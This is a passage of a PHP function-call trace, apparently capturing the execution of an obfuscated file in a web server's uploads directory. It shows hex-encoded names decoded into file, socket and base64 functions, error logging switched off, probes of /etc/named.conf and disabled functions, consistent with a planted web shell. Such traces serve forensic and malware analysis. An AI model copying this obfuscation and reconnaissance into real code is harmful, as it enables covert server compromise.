1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1657	0	0.062140	722896	dehex	1		/var/www/html/uploads/lCT.php	7	1	'63686d6f64'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 9
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1658	0	0.062180	722928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1658	1	0.062192	722976
3	1658	R			99
3	1659	0	0.062204	722896	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1659	1	0.062215	722936
3	1659	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1660	0	0.062245	722960	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	1660	1	0.062257	723008
3	1660	R			104
3	1661	0	0.062269	722928	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	1661	1	0.062281	722968
3	1661	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1662	0	0.062311	722960	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1662	1	0.062326	723008
3	1662	R			109
3	1663	0	0.062339	722928	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1663	1	0.062350	722968
3	1663	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1664	0	0.062386	722960	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1664	1	0.062397	723008
3	1664	R			111
3	1665	0	0.062410	722928	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1665	1	0.062421	722968
3	1665	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1666	0	0.062451	722960	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1666	1	0.062463	723008
3	1666	R			100
3	1667	0	0.062475	722928	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1667	1	0.062487	722968
3	1667	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1657	1	0.062516	722928
2	1657	R			'chmod'
1		A						/var/www/html/uploads/lCT.php	7	$func[85] = 'chmod'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1668	0	0.062550	722928	dehex	1		/var/www/html/uploads/lCT.php	7	1	'666f70656e'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 9
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1669	0	0.062590	722960	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	1669	1	0.062602	723008
3	1669	R			102
3	1670	0	0.062614	722928	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	1670	1	0.062625	722968
3	1670	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1671	0	0.062656	722992	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1671	1	0.062667	723040
3	1671	R			111
3	1672	0	0.062679	722960	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1672	1	0.062691	723000
3	1672	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1673	0	0.062721	722992	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1673	1	0.062733	723040
3	1673	R			112
3	1674	0	0.062745	722960	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1674	1	0.062757	723000
3	1674	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1675	0	0.062787	722992	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1675	1	0.062799	723040
3	1675	R			101
3	1676	0	0.062811	722960	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1676	1	0.062823	723000
3	1676	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1677	0	0.062853	722992	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1677	1	0.062864	723040
3	1677	R			110
3	1678	0	0.062876	722960	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1678	1	0.062887	723000
3	1678	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1668	1	0.062917	722960
2	1668	R			'fopen'
1		A						/var/www/html/uploads/lCT.php	7	$func[86] = 'fopen'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1679	0	0.062950	722960	dehex	1		/var/www/html/uploads/lCT.php	7	1	'667772697465'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 11
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1680	0	0.062991	722992	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	1680	1	0.063002	723040
3	1680	R			102
3	1681	0	0.063015	722960	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	1681	1	0.063026	723000
3	1681	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1682	0	0.063060	723024	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'77'
3	1682	1	0.063072	723072
3	1682	R			119
3	1683	0	0.063085	722992	chr	0		/var/www/html/uploads/lCT.php	204	1	119
3	1683	1	0.063097	723032
3	1683	R			'w'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'w'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1684	0	0.063127	723024	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1684	1	0.063139	723072
3	1684	R			114
3	1685	0	0.063151	722992	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1685	1	0.063163	723032
3	1685	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1686	0	0.063193	723024	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1686	1	0.063204	723072
3	1686	R			105
3	1687	0	0.063217	722992	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1687	1	0.063228	723032
3	1687	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1688	0	0.063258	723024	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1688	1	0.063270	723072
3	1688	R			116
3	1689	0	0.063283	722992	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1689	1	0.063294	723032
3	1689	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1690	0	0.063324	723024	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1690	1	0.063335	723072
3	1690	R			101
3	1691	0	0.063348	722992	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1691	1	0.063359	723032
3	1691	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1679	1	0.063389	722992
2	1679	R			'fwrite'
1		A						/var/www/html/uploads/lCT.php	7	$func[87] = 'fwrite'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1692	0	0.063422	722992	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6261736536345f6465636f6465'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 25
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1693	0	0.063464	723024	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'62'
3	1693	1	0.063475	723072
3	1693	R			98
3	1694	0	0.063488	722992	chr	0		/var/www/html/uploads/lCT.php	204	1	98
3	1694	1	0.063498	723032
3	1694	R			'b'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1695	0	0.063530	723056	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1695	1	0.063541	723104
3	1695	R			97
3	1696	0	0.063554	723024	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1696	1	0.063564	723064
3	1696	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1697	0	0.063595	723056	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1697	1	0.063606	723104
3	1697	R			115
3	1698	0	0.063619	723024	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1698	1	0.063630	723064
3	1698	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1699	0	0.063660	723056	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1699	1	0.063672	723104
3	1699	R			101
3	1700	0	0.063685	723024	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1700	1	0.063695	723064
3	1700	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1701	0	0.063725	723056	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'36'
3	1701	1	0.063737	723104
3	1701	R			54
3	1702	0	0.063750	723024	chr	0		/var/www/html/uploads/lCT.php	204	1	54
3	1702	1	0.063761	723064
3	1702	R			'6'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '6'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1703	0	0.063796	723056	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'34'
3	1703	1	0.063807	723104
3	1703	R			52
3	1704	0	0.063820	723024	chr	0		/var/www/html/uploads/lCT.php	204	1	52
3	1704	1	0.063831	723064
3	1704	R			'4'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '4'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1705	0	0.063861	723056	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1705	1	0.063873	723104
3	1705	R			95
3	1706	0	0.063886	723024	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1706	1	0.063896	723064
3	1706	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1707	0	0.063927	723056	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1707	1	0.063938	723104
3	1707	R			100
3	1708	0	0.063950	723024	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1708	1	0.063961	723064
3	1708	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1709	0	0.063991	723064	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1709	1	0.064003	723112
3	1709	R			101
3	1710	0	0.064015	723032	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1710	1	0.064026	723072
3	1710	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1711	0	0.064056	723064	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1711	1	0.064067	723112
3	1711	R			99
3	1712	0	0.064080	723032	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1712	1	0.064091	723072
3	1712	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1713	0	0.064121	723064	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1713	1	0.064132	723112
3	1713	R			111
3	1714	0	0.064144	723032	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1714	1	0.064155	723072
3	1714	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1715	0	0.064185	723064	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1715	1	0.064196	723112
3	1715	R			100
3	1716	0	0.064209	723032	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1716	1	0.064220	723072
3	1716	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1717	0	0.064250	723064	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1717	1	0.064261	723112
3	1717	R			101
3	1718	0	0.064273	723032	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1718	1	0.064285	723072
3	1718	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1692	1	0.064315	723032
2	1692	R			'base64_decode'
1		A						/var/www/html/uploads/lCT.php	7	$func[88] = 'base64_decode'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1719	0	0.064350	723032	dehex	1		/var/www/html/uploads/lCT.php	7	1	'66736f636b6f70656e'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 17
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1720	0	0.064391	723064	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	1720	1	0.064402	723112
3	1720	R			102
3	1721	0	0.064415	723032	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	1721	1	0.064426	723072
3	1721	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1722	0	0.064456	723096	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1722	1	0.064468	723144
3	1722	R			115
3	1723	0	0.064480	723064	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1723	1	0.064494	723104
3	1723	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1724	0	0.064525	723096	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1724	1	0.064537	723144
3	1724	R			111
3	1725	0	0.064549	723064	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1725	1	0.064560	723104
3	1725	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1726	0	0.064591	723096	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1726	1	0.064602	723144
3	1726	R			99
3	1727	0	0.064615	723064	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1727	1	0.064625	723104
3	1727	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1728	0	0.064656	723096	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6b'
3	1728	1	0.064667	723144
3	1728	R			107
3	1729	0	0.064680	723064	chr	0		/var/www/html/uploads/lCT.php	204	1	107
3	1729	1	0.064691	723104
3	1729	R			'k'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'k'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1730	0	0.064721	723096	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1730	1	0.064732	723144
3	1730	R			111
3	1731	0	0.064744	723064	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1731	1	0.064755	723104
3	1731	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1732	0	0.064785	723096	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1732	1	0.064796	723144
3	1732	R			112
3	1733	0	0.064809	723064	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1733	1	0.064819	723104
3	1733	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1734	0	0.064849	723096	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1734	1	0.064860	723144
3	1734	R			101
3	1735	0	0.064873	723064	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1735	1	0.064883	723104
3	1735	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1736	0	0.064913	723104	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1736	1	0.064924	723152
3	1736	R			110
3	1737	0	0.064937	723072	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1737	1	0.064947	723112
3	1737	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1719	1	0.064977	723072
2	1719	R			'fsockopen'
1		A						/var/www/html/uploads/lCT.php	7	$func[89] = 'fsockopen'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1738	0	0.065012	723072	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6670757473'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 9
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1739	0	0.065052	723104	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	1739	1	0.065064	723152
3	1739	R			102
3	1740	0	0.065076	723072	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	1740	1	0.065087	723112
3	1740	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1741	0	0.065120	723136	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1741	1	0.065132	723184
3	1741	R			112
3	1742	0	0.065147	723104	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1742	1	0.065169	723144
3	1742	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1743	0	0.065203	723136	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	1743	1	0.065215	723184
3	1743	R			117
3	1744	0	0.065232	723104	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	1744	1	0.065243	723144
3	1744	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1745	0	0.065273	723136	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1745	1	0.065285	723184
3	1745	R			116
3	1746	0	0.065298	723104	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1746	1	0.065309	723144
3	1746	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1747	0	0.065339	723136	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1747	1	0.065350	723184
3	1747	R			115
3	1748	0	0.065362	723104	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1748	1	0.065373	723144
3	1748	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1738	1	0.065403	723104
2	1738	R			'fputs'
1		A						/var/www/html/uploads/lCT.php	7	$func[90] = 'fputs'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1749	0	0.065437	723104	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6667657473'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 9
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1750	0	0.065477	723136	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	1750	1	0.065488	723184
3	1750	R			102
3	1751	0	0.065500	723104	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	1751	1	0.065512	723144
3	1751	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1752	0	0.065543	723168	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	1752	1	0.065554	723216
3	1752	R			103
3	1753	0	0.065567	723136	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	1753	1	0.065578	723176
3	1753	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1754	0	0.065608	723168	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1754	1	0.065620	723216
3	1754	R			101
3	1755	0	0.065632	723136	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1755	1	0.065644	723176
3	1755	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1756	0	0.065673	723168	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1756	1	0.065685	723216
3	1756	R			116
3	1757	0	0.065697	723136	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1757	1	0.065709	723176
3	1757	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1758	0	0.065739	723168	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1758	1	0.065750	723216
3	1758	R			115
3	1759	0	0.065762	723136	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1759	1	0.065773	723176
3	1759	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1749	1	0.065803	723136
2	1749	R			'fgets'
1		A						/var/www/html/uploads/lCT.php	7	$func[91] = 'fgets'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1760	0	0.065837	723136	dehex	1		/var/www/html/uploads/lCT.php	7	1	'66636c6f7365'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 11
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1761	0	0.065877	723168	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	1761	1	0.065890	723216
3	1761	R			102
3	1762	0	0.065902	723136	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	1762	1	0.065914	723176
3	1762	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1763	0	0.065944	723200	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1763	1	0.065958	723248
3	1763	R			99
3	1764	0	0.065972	723168	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1764	1	0.065983	723208
3	1764	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1765	0	0.066013	723200	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	1765	1	0.066025	723248
3	1765	R			108
3	1766	0	0.066037	723168	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	1766	1	0.066049	723208
3	1766	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1767	0	0.066079	723200	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1767	1	0.066090	723248
3	1767	R			111
3	1768	0	0.066102	723168	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1768	1	0.066113	723208
3	1768	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1769	0	0.066143	723200	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1769	1	0.066155	723248
3	1769	R			115
3	1770	0	0.066167	723168	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1770	1	0.066178	723208
3	1770	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1771	0	0.066208	723200	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1771	1	0.066219	723248
3	1771	R			101
3	1772	0	0.066232	723168	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1772	1	0.066244	723208
3	1772	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1760	1	0.066273	723168
2	1760	R			'fclose'
1		A						/var/www/html/uploads/lCT.php	7	$func[92] = 'fclose'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1773	0	0.066309	723168	session_start	0		/var/www/html/uploads/lCT.php	10	0
2	1773	1	0.066394	723920
2	1773	R			TRUE
2	1774	0	0.066412	723920	error_reporting	0		/var/www/html/uploads/lCT.php	11	1	0
2	1774	1	0.066426	723960
2	1774	R			22527
2	1775	0	0.066439	723920	set_time_limit	0		/var/www/html/uploads/lCT.php	12	1	0
2	1775	1	0.066457	723984
2	1775	R			FALSE
2	1776	0	0.066471	723952	clearstatcache	0		/var/www/html/uploads/lCT.php	13	0
2	1776	1	0.066483	723952
2	1776	R			NULL
2	1777	0	0.066497	723952	ini_set	0		/var/www/html/uploads/lCT.php	14	2	'error_log'	NULL
2	1777	1	0.066513	724024
2	1777	R			''
2	1778	0	0.066526	723952	ini_set	0		/var/www/html/uploads/lCT.php	15	2	'log_errors'	0
2	1778	1	0.066540	724024
2	1778	R			'1'
2	1779	0	0.066553	723952	ini_set	0		/var/www/html/uploads/lCT.php	16	2	'max_execution_time'	0
2	1779	1	0.066567	723992
2	1779	R			'0'
2	1780	0	0.066580	723920	ini_set	0		/var/www/html/uploads/lCT.php	17	2	'output_buffering'	0
2	1780	1	0.066594	723992
2	1780	R			FALSE
2	1781	0	0.066608	723920	ini_set	0		/var/www/html/uploads/lCT.php	18	2	'display_errors'	0
2	1781	1	0.066621	723992
2	1781	R			''
2	1782	0	0.066635	723920	date_default_timezone_set	0		/var/www/html/uploads/lCT.php	19	1	'Asia/Jakarta'
2	1782	1	0.066651	723984
2	1782	R			TRUE
2	1783	0	0.066665	723936	getcwd	0		/var/www/html/uploads/lCT.php	25	0
2	1783	1	0.066678	723984
2	1783	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/lCT.php	25	$dir = '/var/www/html/uploads'
2	1784	0	0.066705	723984	file_exists	0		/var/www/html/uploads/lCT.php	28	1	'/etc/named.conf'
2	1784	1	0.066726	724024
2	1784	R			FALSE
1		A						/var/www/html/uploads/lCT.php	51	$dom = '<font class=\'text-danger\'>Can\'t Read /etc/named.conf</font>'
2	1785	0	0.066754	723984	str_replace	0		/var/www/html/uploads/lCT.php	54	3	'\\'	'/'	'/var/www/html/uploads'
2	1785	1	0.066769	724080
2	1785	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/lCT.php	54	$dir = '/var/www/html/uploads'
2	1786	0	0.066799	723984	explode	0		/var/www/html/uploads/lCT.php	55	2	'/'	'/var/www/html/uploads'
2	1786	1	0.066813	724560
2	1786	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/lCT.php	55	$scdir = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2	1787	0	0.066848	724488	disk_total_space	0		/var/www/html/uploads/lCT.php	56	1	'/var/www/html/uploads'
2	1787	1	0.066865	724520
2	1787	R			232015802368
1		A						/var/www/html/uploads/lCT.php	56	$total = 232015802368
2	1788	0	0.066890	724488	disk_free_space	0		/var/www/html/uploads/lCT.php	57	1	'/var/www/html/uploads'
2	1788	1	0.066905	724520
2	1788	R			201108824064
1		A						/var/www/html/uploads/lCT.php	57	$free = 201108824064
1		A						/var/www/html/uploads/lCT.php	58	$pers = 86
2	1789	0	0.066940	724488	ini_get	0		/var/www/html/uploads/lCT.php	59	1	'disable_functions'
2	1789	1	0.066955	724968
2	1789	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1		A						/var/www/html/uploads/lCT.php	59	$ds = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
